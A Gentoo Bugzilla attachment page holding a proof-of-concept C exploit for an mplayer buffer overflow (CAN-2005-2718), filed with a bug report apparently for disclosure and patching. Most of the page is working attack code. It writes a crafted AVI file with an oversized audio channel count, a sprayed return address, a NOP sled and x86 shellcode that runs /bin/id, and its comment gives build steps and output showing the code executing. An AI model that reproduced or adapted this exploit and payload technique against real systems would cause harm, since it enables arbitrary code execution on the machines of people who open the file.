Go to:
Gentoo Home
Documentation
Forums
Lists
Bugs
Planet
Store
Wiki
Get Gentoo!
Gentoo's Bugzilla – Attachment 66878 Details for
Bug 103555
media-video/mplayer: buffer overflow (CAN-2005-2718)
Home
|
New
–
[Ex]
|
Browse
|
Search
|
Privacy Policy
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
poc
mplayer.c (text/plain), 2.44 KB, created by
Tavis Ormandy (RETIRED)
on 2005-08-25 10:38:12 UTC
(
hide
)
Description:
poc
Filename:
MIME Type:
Creator:
Tavis Ormandy (RETIRED)
Created:
2005-08-25 10:38:12 UTC
Size:
2.44 KB
patch
obsolete
>#include <string.h> >#include <stdio.h> >#include <stdlib.h> >#include "avilib.h" > >/* > * quick mplayer poc for bug #103555, avilib comes from transcode. > * > * $ tar -zxvf /usr/portage/distfiles/transcode-0.6.14.tar.gz > * $ cd transcode-0.6.14/avilib/ > * $ gcc /path/to/poc.c avilib.c -I. -I../libxio -o exploit > * $ ./exploit > * info: exploit.avi has been created. > * $ mplayer exploit.avi > * $ mplayer -vo sdl -really-quiet exploit.avi > * MPlayer 1.0pre6-3.3.5-20050130 (C) 2000-2004 MPlayer Team > * CPU: Intel Pentium 4/Xeon/Celeron Foster (Family: 8, Stepping: 9) > * Detected cache-line size is 64 bytes > * MMX2 supported but disabled > * CPUflags: MMX: 1 MMX2: 0 3DNow: 0 3DNow2: 0 SSE: 1 SSE2: 1 > * Compiled for x86 CPU with extensions: MMX SSE SSE2 > * > * 73 audio & 180 video codecs > * SDL: Using driver: x11 > * SDL: deactivating XScreensaver/DPMS > * SDL: X11 Resolution 1280x1024 > * SDL: Using 0x32315659 (Planar YV12) image format > * SDL: using hardware-surface > * uid=1000(taviso) gid=100(users) groups=10(wheel),100(users),250(portage) > * > * notice crazy number of channels in audio attributes. > * > * -taviso@gentoo.org > */ > >/* media-video/mplayer-1.0_pre6-r4 on kernel 2.6.7 */ >#define RET_ADDR 0x874ada8 >#define OUTPUT_FILE "exploit.avi" >#define VBUF_SIZE 8192 > >/* execve() /bin/id */ >unsigned char shellcode[] = >"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e" >"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3" >"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc" >"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07" >"\x9f\xcf\x2d\x8e"; > >int main(int argc, char **argv) >{ > unsigned char abuf[8192], *vbuf; > avi_t *avifile; > int i, *p; > > /* open output file */ > avifile = AVI_open_output_file(OUTPUT_FILE); > > /* set attributes */ > AVI_set_video(avifile, 156, 88, 10.0, "cvid"); > AVI_set_audio(avifile, 65025, 11025, 8, 1, 0); > > /* prepare and write audio buffer */ > for (p = (int *)(abuf + 3); > (void *)p <= (void *)&abuf[sizeof (abuf) - 1] - sizeof (void *); p++) > *p = RET_ADDR; > for (i = 0; i < 64; i++) > AVI_write_audio(avifile, abuf, sizeof (abuf)); > > /* prepare and write video buffer */ > vbuf = (unsigned char *) malloc (VBUF_SIZE); > memset(vbuf, 0x90, VBUF_SIZE); > memcpy(vbuf + VBUF_SIZE - sizeof (shellcode), shellcode, sizeof (shellcode)); > AVI_write_frame(avifile, vbuf, VBUF_SIZE, 0); > > /* write avi header */ > AVI_close(avifile); > > fprintf(stdout, "info: %s has been created.\n", OUTPUT_FILE); > return 0; >} > >
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=66878">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 103555
: 66878
